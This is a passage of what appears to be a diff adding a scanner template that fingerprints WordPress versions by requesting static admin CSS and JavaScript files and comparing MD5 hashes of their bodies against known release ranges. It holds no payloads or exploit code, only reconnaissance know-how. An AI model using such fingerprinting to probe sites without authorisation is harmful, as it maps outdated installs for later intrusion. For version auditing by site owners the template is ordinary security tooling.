path: + - "{{BaseURL}}/wp-admin/css/colors-classic.css" + matchers: + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"ee29aa2dc15802e0907872be559c742f\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"84d9192954ff85e1445661888b510fdf\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"65e90510014f31acfc60ce2726d0ef7d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"312a02c212d05b8bf10080e2508f5ead\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ebd741391596236221825c0a4de55904\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"d58169f2b111dafc6c3b049e4ef05a48\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"3efef5c8bcce187e8b46d86f8511121e\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"d726c149e469fc93bd0454666f9d13cd\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"9bd9e568b7630f726ea50c1e5b37b8e0\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.8.6 + dsl: + - "(\"4f0524bd41bf91793c2eab07e8737b24\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"58fb10cc748dd1cde88c24f07ab0e301\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"53f33ed31f23389799301fec86458c06\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"01bf077a9bb28e93c4596ee0063eab83\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"587111ae171780cc7f8dd4ab5bc31818\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"28f5840cdab148f66e3c93ca047fc6d2\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"50ecea581a41faceafa8e3af5116545a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/tiny_mce.js" + matchers: + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"acb33329b9ef8aabd8bd731426803e4e\" == md5(body))" + - type: dsl + name: 3.5.2 - 3.6.1 + dsl: + - "(\"eddb5fda74d41dbdac018167536d8d53\" == md5(body))" + - type: dsl + name: 3.5.1 + dsl: + - "(\"6e79ab6d786c5c95920064add33ee599\" == 
md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"55cd8e5ceca9c1763b1401164d70df50\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7424043e0838819af942d2fc530e8469\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"9754385dabfc67c8b6d49ad4acba25c3\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"a57c0d7464527bc07b34d675d4bf0159\" == md5(body))" + - type: dsl + name: 3.1.1 - 3.1.4 + dsl: + - "(\"e52dfe5056683d653536324fee39ca08\" == md5(body))" + - type: dsl + name: 3.1 + dsl: + - "(\"82ac611e3da57fa3e9973c37491486ee\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"128e75ed19d49a94a771586bf83265ec\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"56c606da29ea9b8f8d823eeab8038ee8\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"e6bbc53a727f3af003af272fd229b0b2\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"61740709537bd19fb6e03b7e11eb8812\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"a3d05665b236944c590493e20860bcdb\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"7293453cf0ff5a9a4cfe8cebd5b5a71a\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"83c83d0f0a71bd57c320d93e59991c53\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"25e1e78d5b0c221e98e14c6e8c62084f\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"4f04728cb4631a553c4266c14b9846aa\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"a306a72ce0f250e5f67132dc6bcb2ccb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"6c4a056298234e78dfef399226863d0a\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"670d07b379f5bfad08e0625eec4699bc\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"b7b29f888d25ff3fcc0471650d6c1ed3\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - 
"(\"3dc984331b01fcfa8d5ec942fa749f38\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"618e785cabef127b6f305551af39194e\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"636d3786cc0a809009380c1b8040e9e1\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"a41175ed3524292e4d29dc11e2486308\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"dca19314e2e3871f91e07bcf64b23e53\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"fd425da3ec4295915254f73403f78d03\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"3edd89cf250ff41992e4aba77c41c195\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"8c7fbc1f9ffd7a9a292b6ae288f1b002\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"8eb485b1fdd4cb0300cb96802908ecc7\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"17ac5e39ad81e92d93b7554a36c276d1\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"0754c40a9f47a4e08e88d057cc185bfd\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"fb5beaa57223ab3cd864e925731bf76f\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"75f1c7eb78821ece2fcf5b7805854488\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"64bab9b4abfb8c4ec53c66d5d2e2df2c\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"0eb6e751aeb328f04eb683731b905ce3\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"ed438902b0622173a5f39650a19c6060\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/wp-admin.css" + matchers: + - type: dsl + name: 4.3 - 5.1.8 + dsl: + - "(\"bfe4bd90350018abc7c9210bfb9d2a5b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ada11abbeb8553e9524605cbfc29d26d\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"ff37a40c48d23ba4ecc09d9a98da1247\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"68600417d5dc22244168b4eeb84f0af4\" == md5(body))" + - 
type: dsl + name: 3.8 + dsl: + - "(\"25554fc81989c307119b7d4818dc3963\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"f0894fa9c9733d0e577fc5beddc726cd\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"25dd20710bf1eec392a00fc892b63fde\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"1906ac1bed40e0c5c7de71f2bc42dc20\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"c8c02c7d0318ddeb985e324f126a19e8\" == md5(body))" + - type: dsl + name: 3.4.1 - 3.4.2 + dsl: + - "(\"dc906af62607ada3fe2baac62ac3cceb\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"d8471b68d45739f07aac407c06fb8903\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"83cf78172b0d46d6a808abf644ed118f\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"a8a5bdf7cb06970dcd1de76dd2f59622\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"0beaaab72e767baed9fabade0b758090\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"9083913dd3999956e49ae0be1cda8db4\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"481dbfb239988dd269ae98e46db408bd\" == md5(body))" + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"96372351aa264d3fc2bb87f97c1ff35b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/editor.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"a22a4909a6b06c17cf62b1977c388e54\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"cf85c9080df7d2d8c27e19e740703c0c\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"6191d588e62256e25a4e735c318b5ab0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d967380a92f98ed2212fe0e433683fd1\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"515272579d154fde40423b78df09eafd\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"45d6407af8df11f4c30ca0771f6f8f1e\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"1541bad21f42a3954d3c9a599d83da7f\" 
== md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"dcc370abb06f10a49b52d1a8ba3ff99e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"2bc7e4b19253eed1e53593a20b24d59a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"adc52d3dcd042be5ae8fee1275c9fba6\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"73fe74163067205c6d4a33d79afb49f0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f5c99de8447a3effc6ef7ca3b8b753a3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/editor.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"0b7a60f594a855e0e26b2f2ec9e69735\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"c87633f8da294feb9c73aacfbfec6445\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"dc9f3b6295f11d544425284077dbe77f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"75cebda3459f61e6d658988be586a6cd\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"51e011a46e2657f9aa80056e9839d5d1\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"05019309afe8ba2eaef54135e1b28f3a\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"ab5e2269551288bd648c259ce2d3e1be\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"60bfecc5cd647b68e7e6031fa539422c\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c6bb12fac52da543dc8bb9b23952c4b9\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"639720f115ef90063f1322115a1d5cd5\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"175c53174f9113c448f919cbccae40d3\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"cb1ca79169dcde958fb4e44d8d04a5fa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-library.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"291bd8b45040401f3a8897c828406b9a\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - 
"(\"74357886d827e1f853efdd226b79f78d\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.4 + dsl: + - "(\"f8dd79f25b1b88b0dac790416138a00a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.1 + dsl: + - "(\"f8852dc27fc72a22978f69c48fc9eda0\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d89c10f1291f8a91b7fc792102e9a50f\" == md5(body))" + - type: dsl + name: 5.1.2 - 5.1.8 + dsl: + - "(\"5797071c93968c42fa3e3273f845dde1\" == md5(body))" + - type: dsl + name: 5.0.6 - 5.0.11 + dsl: + - "(\"0ae164e7a41074a26c6cb3269dc315bb\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"630d0a20ef044b004db95a590b16e539\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"5786c85790791cef4476254b70a3e310\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"77f4bee1b57b7a2e8c7a3a00472fbd93\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"76a8f66f1baf61530ba29a6e63646d14\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"427db941f1aabc7a9e5ea0e422ecbe61\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"18a4cc9108b119dae32fa49b1cf721d5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"072ef14ff62aedc7478e43e8da64965d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-library.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"1d2c405b92e99c5e00853b228f850320\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"c56e6de4eae3228b22d00c3724679a89\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.4 + dsl: + - "(\"3d87ea3fd4d155e3f8d0e1e96cea6256\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.1 + dsl: + - "(\"4521e9e5c60e1b4423ba6fbb131ddc5c\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"98bde7733f06287852aecf081701fd15\" == md5(body))" + - type: dsl + name: 5.1.2 - 5.1.8 + dsl: + - "(\"94a6cbc830b4626b54a58c3834aa3fd3\" == md5(body))" + - type: dsl + name: 5.0.6 - 5.0.11 + dsl: + - 
"(\"a0c292f486ed240d8dd94b46926dc09a\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f02452393cdd7a8b29709778a74ca06e\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"27a78ec28594f9c11c1a5b2a58783ce0\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"4c4aa2ca24ecf50d440b387de1abd66a\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"83e96c1857cf0f48a0977c3f1945ec58\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"4d608fe3d1e2749c4cdb25ab202454ec\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"41822c26ae5c3152c62d680acb4348d6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c5df24c1fff24d23a6e67dbc28c116de\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/comment-reply.js" + matchers: + - type: dsl + name: 4.4 - 4.8.15 + dsl: + - "(\"14eac74ea4d8aeca08e8ef8d54d42600\" == md5(body))" + - type: dsl + name: 3.8 - 4.3.25 + dsl: + - "(\"d30ad028653d4eac285a1d4d06567bbd\" == md5(body))" + - type: dsl + name: 2.7 - 3.7.35 + dsl: + - "(\"20ef5771571f1be483869066b2830c2f\" == md5(body))" + - type: dsl + name: 2.8 - 3.4.2 + dsl: + - "(\"500ceaa723d95be311592bd902d6823e\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"01183853cffabcfc771e87e405727059\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"52a6c4d3a6cefff47b79c30db7d8ee7a\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.2.9 + dsl: + - "(\"34b2e8e0aa667614a0d5f5a51c495523\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"bde01a471cbd94556bde642fb5d9a47e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f64b977554cb703fea652f071f860569\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"b83efaf9c4e6691f4cede5576faea864\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"fec112ee4ed2c2b98379542caf62fdf8\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"7db11622caac3bac91fc306b3a31387d\" == md5(body))" + - type: 
dsl + name: 5.6 + dsl: + - "(\"0cc71f461782b4934436aeffecc878ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/components.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"7c27168f0230a5cb5a821dea4546ca81\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"e62b5f92035e2e50e0586f759514591c\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"84cdfb957f060ba494e4a5178672c106\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6ffc4c427d77a88a1b5cfac3d17cbf47\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"11fe173edfba0532a0a8cf7bd5a205f5\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"663eaffbf181f29735fceeb3c3f97689\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b4f0eb3ad608b4c8e8ee6ba6015bb09a\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"c10f5b9306bb3404b640af730e312d35\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"bd3a91716306fed014aee273763ad179\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"8bd21b96c00552743be00093a557eb02\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3b895f6f07a0d2086b5dbbe22ffb0f62\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/components.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"08c30574c8edf2379c68a601d8b7ee8a\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"0de0e022a32a1fc83bcab47595434875\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"51965929307297ed0ef5e9ad07709dfa\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2f62353fb94912550c115db169918e40\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"3b8ab0e0e89de6e23fa254fcc917bedf\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2b6a7f7c36df118e1fa6c53674607fe5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - 
"(\"edaf8c970a6a15ca0926cb1eba5cca85\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"7a47b05a3d8952e1366b305a9964ceb5\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"77ea71e2d098778a39ce22cd1d46b850\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"15209b1d60d6b5dc64918d87fd039355\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"41aecf7743c41d3a638a22f06c53a2f8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-editor/style-rtl.css" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"0d0078b5771e9db91b0223bd9d596175\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"0bcf1bfb6aadae7de803ddeb3c060658\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"3985f920257f3d239695bc9278fa799b\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"8177cd68c95cec36f7b3e10fdeee8336\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"c527698d617b7d12502c10fa3c15dc19\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"9e4c5d344df641c3ccad1cfcf841f941\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"df8d0fcab2428792fe751d8983e9f7d5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"21aa4baf49dde8193561db25b2209c71\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-editor/style.css" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"75fefe34b7f48fae5e586a1a47ae90bf\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c11c93210abdee789e409376cd0a5c5c\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"943022038ee60fe653ad3661fe5e45f9\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"61ab069aacd4d601a6a2fde14df4e70f\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"480bcf3053b663abbfdafa48493f6374\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"e1210805da48ace34900897bdc5f26bf\" == md5(body))" + - type: dsl + name: 5.5.2 - 
5.5.3 + dsl: + - "(\"cad17c21d91b7f11da688d1e9dce20c5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a85b002b4c0c1e9194944e072a857464\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"58f65a696e381a7e74ed02b7c7eb2f88\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"9fe3e6ba7eb849f83f99d4c157a9351f\" == md5(body))" + - type: dsl + name: 4.6.1 - 4.6.20 + dsl: + - "(\"7475bf3300b9b09cfdad9491bca3f215\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"097f71ecb19edf4fe945a8afee00c908\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"d8d916dc8eb7de2d93753d2f21482101\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"38772ec68546889e62f4cf28fdcbbde9\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6f495e61e507d0ed5a7a9de7019b0f4a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"60b46fe4c022f4124ba8a0507a4abdeb\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c95fbbd85d14b7f107c9363983ba78ff\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"6e89b5fd71d2d1b815c8bd80353b2dce\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"39461240391db9948d3e7d1ad1abfef4\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"73c479e8517d6f74175bc745fdbb6d35\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1488f88d9014008bd0dbb170815afe57\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"bee313b104940f32a4a4b7dea5a7b780\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.5 + dsl: + - "(\"e604b03d546da590669bbfe20a0e7bbf\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"f3c72ab81488215a91b0550d202a08ed\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"98bb07383e45aa479177ad8b6e7f49e4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - 
"(\"083dbc70593847f2e1bf728a58ddd059\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"3d11cdb0e238d76fa865ae1d6929b93c\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"15e61d98724841bd7262998182f3a999\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"340e21ee8bdc8d949bf8f3e619261f3d\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"96d79cf85e8e536a52ea3b2b85f5d688\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"baa7a7a40db081f84136804a07a2e264\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/dashboard-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"62acfa3c0527d48e1f6b05a1e184b342\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"85d54bb343a31b620a1af2d429fc5436\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"fda0e5ce02c5900dd041baab092d4f3a\" == md5(body))" + - type: dsl + name: 4.9.8 + dsl: + - "(\"77529e7ab55b635462f5dbe80593b7eb\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"e954ddd78c021db65a745bcf468e71bf\" == md5(body))" + - type: dsl + name: 4.9.9 + dsl: + - "(\"8cf004a8a36761cc57ccb97afe9b9b30\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8091a06d5574edd3c5259643b8af24b3\" == md5(body))" + - type: dsl + name: 4.9.10 - 4.9.16 + dsl: + - "(\"ba0acdd2da464f6c25a8320816f945d9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"75010bb43088888d3cd66ce3d5093016\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"3d65a0d03b8cf1dccfd86dbb7c4fd1ae\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"34aaa2e3bb0ea2c12c57fb7ab40a3b70\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"74dfbb7f9247575cd6ac455071b2deaf\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d7285996efa524866a6eaaf06cca524b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6f857f13215f9d88f49ecc95ac94b338\" == md5(body))" + - 
method: GET + path: + - "{{BaseURL}}/wp-admin/css/dashboard.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"ed28009277c6fcc98f9d976aa6eba432\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"151dfe98fe81cf303ddd51228ac6f3d0\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"6165fb1bb259adcc78c89832a84aff4d\" == md5(body))" + - type: dsl + name: 4.9.8 + dsl: + - "(\"2cb2a8dd236d1e4a362e1b4ca3f2b84b\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"16ae3878586942fdae57e349dcda572e\" == md5(body))" + - type: dsl + name: 4.9.9 + dsl: + - "(\"fd23950196d3732d26a864dbcd4bcb83\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1ddf24cdfc94b91a28c950825c40c48a\" == md5(body))" + - type: dsl + name: 4.9.10 - 4.9.16 + dsl: + - "(\"7d9026521ee5ae1955003f6bf2693417\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d7a985e8ee7af92319d09bef2a66974b\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f6b3073e60d1315a6594a871465fc199\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"264b0baf2bceaadaf426043b5c4b57bb\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"78aa4721fac928e8a2fcd160af422530\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b6efc3a3ec922c77cfc008ad47e116ee\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"fa022dfaf91f7cf42fe274cdbe5a7fa2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/themes.min.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"ef5290b0b456322ca3ac76b0ab41f054\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"ed740c0a3115880e47cba29134ed6bf8\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"68eb02c6dc043646186b59a360559f0f\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - 